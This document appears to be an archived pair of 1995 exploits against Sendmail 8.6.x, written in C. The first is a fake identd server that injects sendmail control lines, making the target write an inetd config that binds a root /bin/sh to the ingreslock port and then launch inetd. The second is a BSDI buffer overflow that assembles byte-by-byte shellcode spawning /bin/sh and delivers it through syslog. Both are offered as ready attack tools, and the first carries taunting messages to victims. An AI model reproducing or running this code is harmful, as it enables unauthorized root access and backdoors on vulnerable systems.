*NIX Sendmail (8.6.9-8.6.10) - identd hack - execute commands
:
/* Sendmail 8.6.9 identd hack.  -- SnoCrash [r00t] */
/* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */
/* Fixed some more so it can work on 8.6.10 -- 10/2/95 */
/* Final cleanup -- 10/4/95.                           */
#include <stdio.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <gnu/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define OUTPUT_BUFFER 4096   /* Output and input, */
#define SOCKET_BUFFER 512    /* with which we must up-put */
void main(void)
{
        struct fd_set fdesc;   /* File descriptor structure */
        char outbuf[OUTPUT_BUFFER];  /* Our output buffer */
        char inbuf[SOCKET_BUFFER];   /* ""  input "" */
        /* Preparing to read incoming data, captain. */
        FD_ZERO(&fdesc);
        FD_SET(0, &fdesc);
        
        /* Read it, Sulu! Now! */
        if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)                
                exit(1);
        FD_SET(0, &fdesc);
        
        /* Now we send our instructions, under the guise of innocent
         * ol' identd.  I find this ironic, that identd, supposedly
         * a standard that would help stop "evil hacker types", became
         * part of one of the bigger holes to ever hit the net.  Hmm.
         * Ain't life funny that way sometimes? :)
         */
        sprintf(outbuf, " \
%s : USERID : UNIX : Evil_Hacker_Type...Phear_Me.  So, like.. here are \
my evil commands for you to execute so I can rox yer box.  Check this out... \
\r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > \
/tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty \
fucking eleet, eh?  Now I just have to sit here and babble so I can fill \
up your crappy buffer.  So I bet youre wondering how this got here.  Well \
lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \
8.6.12 has a whole load of different bugs, but this isnt one of them. \
Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \
weellll... it's been fun fucking with your box and all, but I really must \
be going, so I guess Ill see you around.  Tell all your friends to be nice \
and leave the door open like you did.  Thanks... its been real.   \unkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just too
funky.\r\n \
", inbuf);
        
        write(1, outbuf, strlen(outbuf));
        exit(0);
}
+++++
*NIX Sendmail (8.6.12) - Buffer Overflow - 
:
/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95       */
/* by following the above document you should be able to write   */
/* buffer overflows for other OS's on other architectures now    */
/* mudge@l0pht.com                                               */
/*                                                               */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/
#include <syslog.h>
char buffer[4028];
void main () {
   int i;
  for(i=0; i<2024; i++)
    buffer[i]=0x90;
  /* should set eip to 0xc73c */
    buffer[2024]=0x3c;
    buffer[2025]=0xc7; 
    buffer[2026]=0x00;
    buffer[2027]=0x00; 
  i=2028;
/* begin actual
 program */
    buffer[i++]=0x89; /* movl %esp, %ebp */
    buffer[i++]=0xe5;
    buffer[i++]=0x33; /* xorl %eax,%eax */
    buffer[i++]=0xc0;
    buffer[i++]=0xeb; /* jmp ahead  */
    buffer[i++]=0x29;
    buffer[i++]=0x5e; /* popl %esi       */
    buffer[i++]=0x59; /* popl %ecx        */
    buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
    buffer[i++]=0x45;   buffer[i++]=0xf5;
    buffer[i++]=0x70;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
    buffer[i++]=0x45;
    buffer[i++]=0xfc;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x6a; /* pushl $0x0 */
    buffer[i++]=0x00;
#ifdef z_out
    buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
    buffer[i++]=0x45;
    buffer[i++]=0xf8;
#endif
/* the above is what the disassembly of execute does... but we only
   want to push /bin/sh to be executed... it looks like this leal
   puts into eax the address where the arguments are going to be
   passed. By pointing to 0xfffffffc(%ebp) we point to a null 
   and don't care about the args... could probably just load up
   the first section movl $0x0,0xfffffff8(%ebp) with a null and
   left this part the way it want's to be */

    buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
    buffer[i++]=0x45; 
    buffer[i++]=0xfc;


    buffer[i++]=0x50; /* pushl %eax */

    buffer[i++]=0x68; /* pushl $0xc773 */
    buffer[i++]=0x73;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x8d; /* lea 0x3b,%eax */
    buffer[i++]=0x05;
    buffer[i++]=0x3b;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x51; /* pushl %ecx */

    buffer[i++]=0x9a; /* lcall 0x7,0x0 */
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x07;
    buffer[i++]=0x00;

    buffer[i++]=0xe8; /* call back to ??? */
    buffer[i++]=0xd2; 
    buffer[i++]=0xff;
    buffer[i++]=0xff;
    buffer[i++]=0xff;

    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]='/';
    buffer[i++]='b';
    buffer[i++]='i';
    buffer[i++]='n';
    buffer[i++]='/';
    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    syslog(LOG_ERR, buffer);
}
